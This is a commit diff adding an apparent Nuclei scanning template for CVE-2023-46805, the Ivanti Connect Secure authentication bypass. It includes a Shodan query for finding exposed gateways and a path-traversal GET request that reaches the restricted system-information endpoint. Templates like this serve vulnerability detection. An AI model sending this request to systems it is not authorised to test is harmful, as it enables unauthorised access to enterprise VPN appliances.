CVE-2023-46805 - Ivanti Connect Secure Authentication Bypass
parent
79e6b4e855
commit
823cbcb226
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-46805
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ivanti ICS - Authentication Bypass
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
|
||||||
|
reference:
|
||||||
|
- https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
|
||||||
|
cvss-score: 8.2
|
||||||
|
cve-id: CVE-2023-46805
|
||||||
|
cwe-id: CWE-287
|
||||||
|
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
vendor: ivanti
|
||||||
|
product: connect_secure
|
||||||
|
shodan-query: html:"welcome.cgi?p=logo"
|
||||||
|
tags: cve,cve2023,kev,auth-bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"build":'
|
||||||
|
- '"system-information":'
|
||||||
|
- '"software-inventory":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue